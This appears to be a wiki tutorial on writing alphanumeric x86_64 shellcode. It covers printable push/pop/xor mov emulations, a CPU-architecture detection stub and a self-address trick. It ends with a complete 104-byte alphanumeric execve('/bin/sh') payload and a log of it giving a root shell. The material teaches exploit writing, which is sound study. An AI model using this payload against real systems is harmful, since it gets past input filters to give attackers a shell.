Shellcode/Alphanumeric
Alphanumeric shellcode is similar to ASCII shellcode in that it is used to bypass character filters and evade intrusion detection during buffer overflow exploitation. It can also be used to determine a number of factors about the target environment, including the return pointer via a last call technique or the instruction set architecture using a GetCPU stub. The alphanumeric opcodes available on the 64-bit x86 architecture limit the instructions that can modify data to pop, movslq, xor, and imul.
Shellcode/Alphanumeric requires a basic understanding of bitwise math, assembly and shellcode.
Special thanks to hatter for his contributions to this article.
Alphanumeric x86_64 register value and data manipulation
Because alphanumeric shellcode has such a limited instruction set, it is important to note the different ways each register can be manipulated within it. Identifying these leads to mov emulations, which make up most of the actual code.
Alphanumeric data can be pushed in one-byte, two-byte, and four-byte quantities at once. Pushing the 64-bit registers RAX-RDI is done using a single upper-case letter P-W (\x50-\x57), depending on which register is being pushed. Prefixing with "A" (for the extended registers R8-R15) or "f" (for the 16-bit registers AX-DI) gives access to 32 pushable registers in total. For the 16-bit extended registers R8W-R15W, "f" is prefixed to the corresponding R8-R15 push (e.g. "fAP" for R8W).
Pop is more limited in its range of usable registers: only RAX, RCX, and RDX (X, Y, and Z, \x58-\x5a) have alphanumeric pop opcodes. As with push, prefixes give access to the 16-bit and extended registers, so a total of 12 registers (6 full-size and 6 16-bit) can be popped.
For the extended registers, the pops of RAX, RCX, and RDX are prefixed with "A" to obtain the corresponding R8, R9, and R10 pops. The 16-bit registers use the 0x66 ('f') prefix, or 'fA' for the extended ones.
Using push and pop, the values of 6 full-size CPU registers can be set:
- %rax
- %rcx
- %rdx
- %r8
- %r9
- %r10
Or the value of any of the 16 full-size CPU registers can be placed on top of the stack:
- %r8-%r15
- %rax-%rdi
There are 5 main registers (listed below) and 5 special 64-bit registers (%r11-%r15) that can be pushed, but not popped:
- %rbx
- %rsp
- %rbp
- %rsi
- %rdi
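The push and pop encodings described above can be tabulated with a short script. This is a minimal sketch: the helper names `encode` and `is_alnum` are made up for illustration, and only the single-byte 0x50/0x58 opcode families plus the 0x41 ('A') prefix mentioned in the text are modelled.

```python
import string

ALNUM = set((string.ascii_letters + string.digits).encode())

# Register order as used in the low three bits of the push/pop opcodes.
LEGACY = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
EXTENDED = ["r8", "r9", "r10", "r11", "r12", "r13", "r14", "r15"]


def encode(base_opcode, reg):
    """Bytes for push (base 0x50) or pop (base 0x58) of a 64-bit register."""
    if reg in LEGACY:
        return bytes([base_opcode + LEGACY.index(reg)])
    # Extended registers reuse the same opcode behind the 0x41 ('A') prefix.
    return bytes([0x41, base_opcode + EXTENDED.index(reg)])


def is_alnum(code):
    """True when every byte is an ASCII letter or digit."""
    return all(b in ALNUM for b in code)


pushable = [r for r in LEGACY + EXTENDED if is_alnum(encode(0x50, r))]
poppable = [r for r in LEGACY + EXTENDED if is_alnum(encode(0x58, r))]

for reg in LEGACY + EXTENDED:
    pop_text = encode(0x58, reg).decode("ascii") if reg in poppable else "(not alphanumeric)"
    print(f"{reg:>4}  push={encode(0x50, reg).decode('ascii'):<3} pop={pop_text}")
```

Running it shows that every push stays within P-W (optionally behind 'A'), while only the first three pop opcodes (X, Y, Z) are letters, which is where the six poppable registers come from.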
These registers can still be written using only alphanumeric instructions and operands by going through any of the 6 fully controllable registers and emulating mov with push and pop. The following sections attempt to find instructions that set their values using only the registers already accessible.
The special register prefix has been identified:
0x41, 'A'
The word operand override has been identified:
0x66, 'f'
Note the identification of all the alphanumeric overrides and prefixes. These overrides are very similar to those for 32 bit platforms.
Opcodes used for popping a register can also be used as 'register operands' for more advanced instructions. For example, in an xor instruction the %rax register can be changed to %rcx or %rdx by using the 0x59 (Y) or 0x5a (Z) byte in place of the 0x58 (X) byte.
Whenever there is a controllable register, the notation {reg} is used to mark it as an option. In the bytecode and string examples, a '?' is used in the bytecode itself and a '*' denotes the register operand.
The opcodes for %rax, %rcx, and %rdx are important and thus will be used frequently. When encountering multiple operands, the operand number is used in the notation for readability purposes.
Investigating %rbx to identify ways of setting the rest of the registers was not entirely fruitful. Full control over the %rbx register is not available; however, write access to its sub-registers is:
- %ebx
- %bx
- %bh
- %bl
Upon further investigation, this opened up access to multiple additional registers using:
- Xor
- Imul
- Movslq
To access the %ss segment, its prefix (0x36, "6") is inserted at the beginning of the instruction's bytecode (e.g. "63*?" instead of "3*?"). If the special 64-bit registers are to be used, 0x41 ("A") is placed at the beginning of the bytecode. If both are required, the %ss segment prefix must always come first, e.g. "6A3*?". A 64-bit force operator (in this case 0x48, "H") can be placed before any of these instructions so that a 32-bit register operand is treated as its 64-bit counterpart.
Assembly | Hexadecimal | Alpha |
---|---|---|
imul $0x[byte1],0x[byte2]({reg64}),{reg64} | \x48\x6b\x??\x#2\x#1 | Hk*21 |
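The "Hk*21" pattern in the table can be made concrete by assembling one instance by hand. The sketch below is an illustration under stated assumptions: `imul_imm8` is a hypothetical helper, it covers only the eight legacy registers, and it uses the standard ModRM layout (mod=01 for a base register plus an 8-bit displacement).

```python
REG = {"rax": 0, "rcx": 1, "rdx": 2, "rbx": 3, "rsp": 4, "rbp": 5, "rsi": 6, "rdi": 7}


def imul_imm8(imm8, disp8, base, dst):
    """Encode imul $imm8, disp8(%base), %dst with the 0x48 0x6b opcode pair."""
    if base == "rsp":
        raise ValueError("a %rsp base needs an extra SIB byte, not modelled here")
    # ModRM: mod=01 (disp8), reg=destination, rm=base register.
    modrm = 0x40 | (REG[dst] << 3) | REG[base]
    # Byte order matches the table: prefix, opcode, ModRM ('*'), disp8 ('2'), imm8 ('1').
    return bytes([0x48, 0x6B, modrm, disp8, imm8])


code = imul_imm8(0x30, 0x30, "rcx", "rbx")
print(code.hex(" "), code.decode("ascii"))
```

For `imul $0x30,0x30(%rcx),%rbx` the '*' position becomes 0x59 ("Y"), so the whole instruction is the printable string "HkY00".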
To set the value of %rbx directly, imul, xor, and movslq can be used. It is similar for other registers:
- %rbp
- %rsp
Left over are %rsp, %rbp, %rdi, and %rsi. Taking a closer look at xor, the opcodes starting at 0x30 and ending at 0x35 are valuable xor instructions:
- 0x30 is a multi-byte xor instruction, requiring at least two operands (even if one of them denotes a register).
- 0x31 is as flexible as 0x30.
- 0x32 is just as flexible, although the offsets will change source side rather than destination side.
- 0x33 is the opposite of 0x31 and as flexible.
Combining the knowledge of xor with knowledge of the stack: whenever data is pushed, it is accessible at %ss:(%rsp). Knowing this, an available register (e.g. %rcx) can be used as a copy of the stack pointer to set values on some of the more difficult registers:
- %rbx
- %rsp
- %rbp
- %rsi
- %rdi
First, utilise push and pop to simulate 'mov':
<syntaxhighlight lang="asm">
push %rsp    # \x54
pop %rcx     # \x59
pop %rax     # \x58 (this just sets the pointer back)
</syntaxhighlight>
Two XOR parameters allow index registers to be set, %rsi and %rdi. For now, they will be zero'd out:
<syntaxhighlight lang="asm">
push %rsi                # \x56
xor %ss:(%rcx), %rsi     # \x36\x48\x33\x31
pop %r8                  # \x41\x58
push %rdi                # \x57
xor %ss:(%rcx), %rdi     # \x36\x48\x33\x39
pop %r8                  # \x41\x58
</syntaxhighlight>
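One way to see why %rsi and %rdi are the two registers that can be xored directly against (%rcx) is to enumerate the ModRM byte for each destination register. This is a sketch based on the standard ModRM layout (mod, reg, rm fields); the names `modrm`, `no_disp` and `disp8` are illustrative and not part of the original article.

```python
import string

ALNUM = set((string.ascii_letters + string.digits).encode())
REGS = ["rax", "rcx", "rdx", "rbx", "rsp", "rbp", "rsi", "rdi"]
RCX = 1  # rm field value for a (%rcx) memory operand


def modrm(mod, reg, rm):
    """Pack the three ModRM fields into one byte."""
    return (mod << 6) | (reg << 3) | rm


# mod=00: plain (%rcx); mod=01: disp8(%rcx), e.g. 0x30(%rcx).
no_disp = [r for i, r in enumerate(REGS) if modrm(0b00, i, RCX) in ALNUM]
disp8 = [r for i, r in enumerate(REGS) if modrm(0b01, i, RCX) in ALNUM]

print("xor (%rcx), reg      ->", no_disp)
print("xor disp8(%rcx), reg ->", disp8)
```

Without a displacement only the bytes 0x31 ("1") and 0x39 ("9") are alphanumeric, which correspond to %rsi and %rdi. With an 8-bit displacement all eight ModRM bytes are letters, which is consistent with the later use of 0x30(%rcx) for %rbx and %rbp.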
Now %rsi and %rdi have been zero'd out. %r14 and %r15 special registers can also be pushed and zeroed out in this fashion. Now "full control" is gained over:
- %rax
- %rcx
- %rdx
- %rsi
- %rdi
- %r8
- %r9
- %r10
- %r14
- %r15
So far, in this sample, full control has not been utilized over:
- %rsp
- %rbp
- %rbx
- %r11
- %r12
- %r13
As with push, controllable data is required before a register can be set. Where pop is concerned, something may need to be pushed to the stack first; in this case, only a zero register is required. Because of the way xor works, once any register holds zero (here %rax is used as the zero register), it can be used to get %rbx, %rsp, and %rbp to zero if needed:
To zero %rbx and %rbp:
<syntaxhighlight lang="asm">
xor %ss:0x30(%rcx), %rax          # store that value in rax
xor %rax, %ss:0x30(%rcx)          # null that area of stack
imul $0x30,%ss:0x30(%rcx),%rbx    # 0x30 * 0 = 0
imul $0x30,%ss:0x30(%rcx),%rbp    # 0x30 * 0 = 0
</syntaxhighlight>
Once the stack space as well as the destination is set to zero, %rax can effectively be mov(ed) into %rbp:
<syntaxhighlight lang="asm">
xor %rax,%ss:0x30(%rcx)    # 36 48 31 41 30
xor %ss:0x30(%rcx),%rbp    # 36 48 33 69 30
</syntaxhighlight>
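The two-xor mov emulation can be checked with plain integer arithmetic. The sketch below models the stack slot and the registers as Python integers; `xor_mov` is a hypothetical helper written for this illustration.

```python
MASK64 = (1 << 64) - 1


def xor_mov(src, slot=0, dst=0):
    """Model: xor %src, slot ; xor slot, %dst. Returns (dst, slot) afterwards."""
    slot = (slot ^ src) & MASK64   # xor %rax, %ss:0x30(%rcx)
    dst = (dst ^ slot) & MASK64    # xor %ss:0x30(%rcx), %rbp
    return dst, slot


# With a zeroed slot and a zeroed destination the value is copied exactly.
print(xor_mov(0xDEADBEEF))

# If the slot was not zeroed first, the destination ends up with src ^ slot instead.
print(xor_mov(5, slot=3))
```

The second call shows why the slot and the destination are zeroed beforehand: any leftover bits are mixed into the result rather than overwritten.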
The closest thing to incrementing and decrementing is the ability to use the ins and outs instructions to add or subtract 1, 2, or 4 against the %rdi register. This still leaves no significant add or sub. Imul can be used with 16 and 8 bit registers to find division. If %rsi or %rdi are not in use, there is also a magic mov:
<syntaxhighlight lang="asm">
movslq %ss:0x30(%rcx), %rsi
xor %rsi, %ss:0x30(%rcx)
</syntaxhighlight>
This can come in quite handy when chunking large pieces of data to 0.
Environment
GetCPU
Architecture can only be determined when compatible channels between the target instruction set architectures can be isolated. As long as the instructions perform valid behavior and do not cause access faults on operating systems native to the architecture, it is possible to use a single bytecode sequence in order to determine architecture across a variety of processors. It generally takes a great amount of familiarity and experience with two or more given instruction sets to write shellcode for multiple architectures.
The x86_64 instruction set architecture (also known as x64) was designed by AMD as a backward-compatible extension of Intel's x86, so the two instruction sets do not differ vastly.
An alphanumeric instruction compatibility chart can be derived by cross referencing available alphanumeric 64 bit instructions with available printable 32 bit instructions.
Inter-compatibility theory
Specifically non-compatible are the 32 and 64 bit opcodes in the range 0x40-0x4f, as they allow a 32 bit processor to increment or decrement its general-purpose registers, but become prefixes for manipulation of 64 bit registers and 8 additional 64 bit general purpose registers in x64 environments, %r8-%r15.
Since not all opcodes are intercompatible, yet comparisons and conditional jumps are intercompatible, it is possible to determine the architecture of an x86 processor using exclusively alphanumeric opcodes.
By making use of these additional registers (which 32 bit processors do not have), one can perform an operation that will set a value on a different register in the two processors. Following this, a conditional statement can be made against one of the two registers to determine if the value was set.
Using the pop instruction is the most effective way to set the value of a register due to instructional limitations (to keep the code alphanumeric). Using an alternative register to %rsp or %esp as a placeholder for the stack pointer enables the use of an effective conditional statement to determine if the value of a register is equal to the most recent thing pushed or popped from the stack.
Practically Applied: Code
This simple alphanumeric bytecode is 15 bytes long, ending in a comparison which returns equal on a 32 bit system and not equal on a 64 bit system.
When implementing this bytecode, a conditional jump afterwards may be best reserved for the t and u instructions, jump if equal and jump if not equal, respectively.
- Assembled:
- TX4HPZTAZAYVH92
- Disassembly:
The table here lists each opcode sequence alongside its disassembly on each architecture. Rows whose opcodes begin with 0x41 or 0x48 decode differently on the two instruction sets.
OpCodes | x86 | x64 |
---|---|---|
54 | push %esp | push %rsp |
58 | pop %eax | pop %rax |
34 48 | xor $0x48, %al | xor $0x48, %al |
50 | push %eax | push %rax |
5a | pop %edx | pop %rdx |
54 | push %esp | push %rsp |
41 5a | inc %ecx; pop %edx | pop %r10 |
41 59 | inc %ecx; pop %ecx | pop %r9 |
56 | push %esi | push %rsi |
48 39 32 | dec %eax; cmp %esi,(%edx) | cmp %rsi,(%rdx) |
This code executes similarly, but not identically, on 32-bit and 64-bit systems. The key discrepancy between how the two architectures execute this code is centered around the opcodes 0x40-0x4f.
Under a 32-bit architecture, this code pops the value of %esp (which was pushed onto the stack previously) into %edx and increments %ecx. Since the %esp register is a pointer to the top of the stack, %edx now contains a pointer to the top of the stack. After this is done, the shellcode continues on to push %esi onto the stack, so the value of %esi now resides at the top of the stack. When the code executes its final comparison, "cmp %esi, (%edx)", it is comparing the value of %esi to the value that %edx points to. As %edx points to the top of the stack, and because %esi has just been pushed to the top of the stack, the comparison is between the value of %esi and itself. Therefore, equal is returned.
Under a 64-bit architecture the comparison returns not equal. The opcodes "41 5a 41 59" have a different function: instead of popping the value of %rsp into %rdx, the code pops it into the 64-bit register %r10 without incrementing %ecx or %rcx, as 0x41 is used as a prefix that selects the extended 64-bit registers. As a result, when the final comparison is made between %rsi and the value referenced by %rdx, it returns not equal, as %rdx does not point to the top of the stack.
On a 64-bit system, this will not cause a segfault because (%rdx) points to somewhere inside the stack.
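The two execution paths can be traced with a toy model. This is a sketch only: the starting stack pointer and register values are arbitrary assumptions, memory is a sparse dictionary in which unwritten cells read as 0, and only the instructions from the table are modelled. On real hardware the value at (%rdx) in the 64-bit case is whatever happens to be on the stack.

```python
def compare_result(bits):
    """Trace the 15-byte stub and return True if the final cmp reports equal."""
    word = bits // 8
    sp = 0x7000                      # hypothetical initial stack pointer
    regs = {"ax": 0x1111, "cx": 0x2222, "dx": 0x3333, "si": 0x4444}
    mem = {}                         # sparse memory, unwritten cells read as 0

    def push(value):
        nonlocal sp
        sp -= word
        mem[sp] = value

    def pop():
        nonlocal sp
        value = mem.get(sp, 0)
        sp += word
        return value

    push(sp)                         # 54     push %esp / %rsp (old value is stored)
    regs["ax"] = pop()               # 58     pop %eax / %rax
    regs["ax"] ^= 0x48               # 34 48  xor $0x48, %al
    push(regs["ax"])                 # 50     push %eax / %rax
    regs["dx"] = pop()               # 5a     pop %edx / %rdx
    push(sp)                         # 54     push %esp / %rsp
    if bits == 32:
        regs["cx"] += 1              # 41     inc %ecx
        regs["dx"] = pop()           # 5a     pop %edx
        regs["cx"] += 1              # 41     inc %ecx
        regs["cx"] = pop()           # 59     pop %ecx
    else:
        regs["r10"] = pop()          # 41 5a  pop %r10
        regs["r9"] = pop()           # 41 59  pop %r9
    push(regs["si"])                 # 56     push %esi / %rsi
    if bits == 32:
        regs["ax"] -= 1              # 48     dec %eax
    # 39 32: cmp %esi,(%edx) / cmp %rsi,(%rdx)
    return mem.get(regs["dx"], 0) == regs["si"]


print("32-bit equal:", compare_result(32))
print("64-bit equal:", compare_result(64))
```

In the 32-bit trace %edx is reloaded with the stack pointer, so the comparison reads back the value just pushed. In the 64-bit trace %rdx keeps the xor-modified pointer and the comparison reads a different cell.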
Last call
XTX4E4UH10H30
The steps taken in order to obtain the address to the beginning of the shellcode in only alphanumeric code are a little more complex.
First, to prevent destroying the return pointer (the target data), at least 8 must be added to the stack pointer. This can be done with any conventional pop operation, in this case pop %rax. %rsp is then moved into %rax through a push/pop mov emulation.
<syntaxhighlight lang="asm">
pop %rax
push %rsp    # move pointer to %rsp into %rax
pop %rax
</syntaxhighlight>
Because the pop has added 0x8 to %rsp, 0x10 must be subtracted from %rax in order to access the return pointer. This is emulated by XORing %al with 0x45 and then 0x55:
<syntaxhighlight lang="asm">
xor $0x45,%al    # subtract 0x10 from %rax
xor $0x55,%al
</syntaxhighlight>
This effectively runs a NOT operation against a single bit (0x45 xor 0x55 = 0x10). Because of this, the operation either adds or subtracts 0x10 depending on the current state of that bit, and is not guaranteed to work on its first execution. This is easily mitigated through repeated execution (and it may not work at times with ASLR disabled).
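The add-or-subtract behaviour of the xor pair can be seen by applying it to two sample low bytes. The sample values below are arbitrary and chosen only for illustration; `adjust` is a hypothetical helper.

```python
def adjust(al):
    """Apply xor $0x45,%al followed by xor $0x55,%al to an 8-bit value."""
    return (al ^ 0x45 ^ 0x55) & 0xFF


for al in (0x38, 0x28):
    result = adjust(al)
    print(f"{al:#04x} -> {result:#04x} (delta {result - al:+d})")
```

When bit 4 of %al is set the pair subtracts 0x10, and when it is clear the pair adds 0x10, which is why the outcome depends on where the stack happens to sit.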
The most recently returned-from return address is then moved into %rsi through the use of an xor mov emulation:
<syntaxhighlight lang="asm">
xor %rsi,(%rax)
xor (%rax),%rsi    # move address to last instruction into %rsi
</syntaxhighlight>
Example: Zeroing Out x86_64 CPU Registers
First %rsp is pushed to the top of the stack and the pointer address is popped into %rcx. The final pop (into %r8) moves %rsp up so that the next push lands exactly at the address now held in %rcx.
<syntaxhighlight lang="asm">
push %rsp
pop %rcx
pop %r8
</syntaxhighlight>
The following push overwrites %ss:(%rcx) with the contents of %rsi, the xor zeroes out %rsi by xoring it against its own value on the stack, and the pop then restores %rsp to its position before the push.
<syntaxhighlight lang="asm">
push %rsi
xor %ss:(%rcx), %rsi
pop %r8
</syntaxhighlight>
Again using the same form, %ss:(%rcx) is overwritten, %rdi is zeroed out using xor, and %rsp is restored.
<syntaxhighlight lang="asm">
push %rdi
xor %ss:(%rcx), %rdi
pop %r8
</syntaxhighlight>
Zeroing out %rdx is much simpler.
<syntaxhighlight lang="asm">
push %rdi
pop %rdx
</syntaxhighlight>
The following push and pop sets %rax to 0x30. %al is the lowest order 8 bit subregister of %rax. Since 0x30 resides in %al, the xor effectively zeroes out %rax.
<syntaxhighlight lang="asm">
push $0x30
pop %rax
xor $0x30, %al
</syntaxhighlight>
For %rbx and %rbp, %ss:0x30(%rcx) is first zeroed out. Each register is then xored into that location, and the location is xored back against the register, which results in each register being zeroed out.
Zero out the %ss:0x30(%rcx) stack segment.
<syntaxhighlight lang="asm">
xor %ss:0x30(%rcx), %rax
xor %rax, %ss:0x30(%rcx)
</syntaxhighlight>
xor %rbx into the stack segment and then xor it against %rbx to zero.
<syntaxhighlight lang="asm">
xor %rbx, %ss:0x30(%rcx)
xor %ss:0x30(%rcx), %rbx
</syntaxhighlight>
Rezero the stack segment with %rax.
<syntaxhighlight lang="asm">
push %rdx
pop %rax
xor %ss:0x30(%rcx), %rax
xor %rax, %ss:0x30(%rcx)
</syntaxhighlight>
As before, xor %rbp into the stack segment and then xor it against %rbp to zero.
<syntaxhighlight lang="asm">
xor %rbp, %ss:0x30(%rcx)
xor %ss:0x30(%rcx), %rbp
</syntaxhighlight>
64 bit shellcode: Conversion to alphanumeric code
- Because of the limited instruction set, the conversion requires many mov emulations via xor, imul, movslq, push, and pop.
Starting shellcode (64-bit execve /bin/sh)
This was converted to shellcode from the example in 64 bit linux assembly
- execve('/bin/sh');
<syntaxhighlight lang="asm">
.section .data
.section .text
.globl _start
_start:
    # a function is f(%rdi, %rsi, %rdx, %r10, %r8, %r9).
    # Use zeroed memory to zero out %rsi, %rdi, %rdx
    xor %rdi, %rdi
    push %rdi
    push %rdi
    pop %rsi
    pop %rdx
    # Store '/bin/sh\0' in %rdi
    movq $0x68732f6e69622f6a, %rdi
    shr $0x8,%rdi
    push %rdi
    push %rsp
    pop %rdi
    push $0x3b
    pop %rax
    syscall    # execve('/bin/sh', null, null)
               # function no. is 59/0x3b - execve()
</syntaxhighlight>
- execve('/bin/sh')
"\x48\x31\xff\x57\x57\x5e\x5a\x48\xbf\x6a\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xef\x08\x57\x54\x5f\x6a\x3b\x58\x0f\x05"
Shellcode Analysis
Immediately before the syscall:
- %rax is set to 0x3b
- %rdi is a pointer to '/bin/sh\0'
- %rsi and %rdx are null
To reproduce this, because the syscall instruction is not alphanumeric, it must be written at run time to a location that will be executed after the currently executing code. The xor and imul instructions can then be used to set values on registers.
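Which bytes of the starting shellcode fall outside the alphanumeric range can be listed directly from the byte string given earlier. The script is a minimal sketch; the variable names are illustrative.

```python
import string

ALNUM = set((string.ascii_letters + string.digits).encode())

# The 64-bit execve('/bin/sh') shellcode quoted above, as hex.
shellcode = bytes.fromhex(
    "4831ff57575e5a48bf6a2f62696e2f7368"
    "48c1ef0857545f6a3b580f05"
)

# Collect (offset, byte) pairs that a strict alphanumeric filter would reject.
blocked = [(i, b) for i, b in enumerate(shellcode) if b not in ALNUM]

print(len(shellcode), "bytes,", len(blocked), "non-alphanumeric")
for offset, byte in blocked:
    print(f"  offset {offset:2d}: {byte:#04x}")
```

The last two entries are the 0x0f 0x05 syscall opcode, which is why the alphanumeric version has to construct those bytes at run time.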
Writing the syscall
The very first part of the code is used to determine location and write a syscall to the end.
<syntaxhighlight lang="asm">
pop %rax
push %rsp
pop %rax
xor $0x65,%al
xor $0x75,%al
xor %rsi, (%rax)      # mov emulated into rsi
xor (%rax), %rsi
push %rsi
pop %rcx
pushq $0x3030474a
pop %rax
xor %eax,0x64(%rcx)
</syntaxhighlight>
- This next xor comes out to 0x0000050f, which is stored in memory in little-endian order as the bytes 0f 05 00 00. 0x0f 0x05 is the machine code for a syscall.
0x3030474a xor 0x30304245 (the "EB00" at the end of the shellcode), which before the xor disassembles as:
rex.RB rex.X xor %sil,(%rax)
- The 'EB' in 'EB00' at the end of the shellcode has become 0x050f (the bytes 0f 05).
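The arithmetic behind the self-modifying step can be verified in a few lines. This is only a check of the constants quoted above; the variable names are illustrative.

```python
pushed = 0x3030474A                          # immediate from pushq $0x3030474a
tail = int.from_bytes(b"EB00", "little")     # the four bytes at the end of the shellcode

result = pushed ^ tail
patched = result.to_bytes(4, "little")       # byte order as it ends up in memory

print(f"tail    = {tail:#010x}")
print(f"result  = {result:#010x}")
print("patched =", patched.hex(" "))
```

Both the pushed immediate (the bytes "JG00") and the placeholder "EB00" are alphanumeric, yet their xor leaves 0f 05 at the start of the patched dword.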
Arguments
Stack Space
- Zero out a qword of data starting at %rcx + 0x30 (48 in decimal)
<syntaxhighlight lang="asm">
# Allocate stack space
movslq 0x30(%rcx), %rsi
xor %esi, 0x30(%rcx)
movslq 0x34(%rcx), %rsi
xor %esi, 0x34(%rcx)
</syntaxhighlight>
Register Initialization
- The %rdx, %rdi, and %rsi registers are used for the execve() syscall. These are zeroed out to initialize their values using the stack space previously allocated.
<syntaxhighlight lang="asm">
# Zero rdx, rsi, and rdi
movslq 0x30(%rcx), %rdi
movslq 0x30(%rcx), %rsi
push %rdi
pop %rdx
</syntaxhighlight>
String Argument
- /bin is placed onto the stack at the space allocated at %rcx + 0x30.
<syntaxhighlight lang="asm">
push $0x5a58555a
pop %rax
xor $0x34313775, %eax
xor %eax, 0x30(%rcx)
</syntaxhighlight>
- /sh\0 is placed onto the stack at the space allocated at %rcx + 0x34.
<syntaxhighlight lang="asm">
push $0x6a51475a
pop %rax
xor $0x6a393475, %eax
xor %eax, 0x34(%rcx)
</syntaxhighlight>
- xor is used as a mov emulation to place '/bin/sh\0' into %rdi.
<syntaxhighlight lang="asm">
xor 0x30(%rcx), %rdi
</syntaxhighlight>
- Set the stack pointer back so %rsp = %rcx + 8 so that the push of %rdi does not overwrite (%rcx). Push '/bin/sh\0'.
<syntaxhighlight lang="asm">
pop %rax
push %rdi
</syntaxhighlight>
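The two xor pairs used for the string can be checked by replaying them against a zeroed eight-byte buffer, which stands in for the qword at %rcx + 0x30. This is a verification sketch of the constants above, not an encoder.

```python
# offset from %rcx -> (pushed immediate, xor immediate), as given in the listing
pairs = {
    0x30: (0x5A58555A, 0x34313775),
    0x34: (0x6A51475A, 0x6A393475),
}

slot = bytearray(8)  # models the zeroed qword at %rcx + 0x30

for offset, (pushed, mask) in pairs.items():
    eax = pushed ^ mask                       # xor $mask, %eax
    start = offset - 0x30
    current = int.from_bytes(slot[start:start + 4], "little")
    # xor %eax, offset(%rcx): the slot is zero, so this acts as a store
    slot[start:start + 4] = (current ^ eax).to_bytes(4, "little")

print(bytes(slot))
```

All four immediates consist of alphanumeric bytes ("ZUXZ", "u714", "ZGQj", "u49j"), while the combined result contains the '/' and NUL bytes that could not be pushed directly.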
Final Registers
- %rsi and %rdx are 0. First, push a byte to meet the sign requirement for movslq, then zero %rdi.
<syntaxhighlight lang="asm">
push $0x58
movslq (%rcx), %rdi
xor (%rcx), %rdi
</syntaxhighlight>
- Align %rsp and %rcx, then use a mov emulation to place %rsp into %rdi. %rdi then contains a pointer to '/bin/sh\0'.
<syntaxhighlight lang="asm">
pop %rax
push %rsp
xor (%rcx), %rdi
</syntaxhighlight>
- %rax is set to 59 or 0x3b for the execve() syscall.
<syntaxhighlight lang="asm">
xor $0x63, %al
</syntaxhighlight>
Final registers:
- %rax = 0x3b
- %rdi = pointer to '/bin/sh\0'
- %rsi = null
- %rdx = null
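The final value of %rax follows from the 0x58 that was pushed earlier and later popped into %rax, combined with the last xor. The check below is a small sketch of that arithmetic. It assumes, from reading the listing, that the `pop %rax` in the alignment step retrieves the 0x58 pushed for movslq.

```python
import string

ALNUM = set((string.ascii_letters + string.digits).encode())

rax = 0x58        # assumed: value popped into %rax after `push $0x58`
rax ^= 0x63       # xor $0x63, %al

print(hex(rax), rax)
print("0x3b alphanumeric?", 0x3B in ALNUM)
print("0x58 and 0x63 alphanumeric?", 0x58 in ALNUM and 0x63 in ALNUM)
```

The syscall number 0x3b (';') is not itself an alphanumeric byte, so it is produced from two bytes that are ('X' and 'c').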
Payload
- x86_64 alphanumeric execve('/bin/sh',null,null) - 104 bytes ~ Hatter
Successful Execution
During a buffer overflow, this condition is met 100% of the time.
<syntaxhighlight lang="text">
root ~ # ./loader-64 XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZhZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00
# id
uid=0(root) gid=0(root) groups=0(root)
# uname -p
x86_64
# exit
root ~ #
</syntaxhighlight>
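The properties claimed for the payload (length, character set, and the position of the placeholder that is patched into a syscall) can be confirmed from the string itself. The script below is a sketch that inspects the payload as data and does not execute it.

```python
payload = (
    b"XTX4e4uH10H30VYhJG00X1AdTYXHcq01q0Hcq41q4Hcy0Hcq0WZ"
    b"hZUXZX5u7141A0hZGQjX5u49j1A4H3y0XWjXHc9H39XTH394cEB00"
)

print("length:", len(payload))
print("alphanumeric only:", payload.isalnum())
print("bytes at offset 0x64:", payload[0x64:])
```

The placeholder "EB00" sits at offset 0x64, matching the `xor %eax,0x64(%rcx)` instruction that rewrites it.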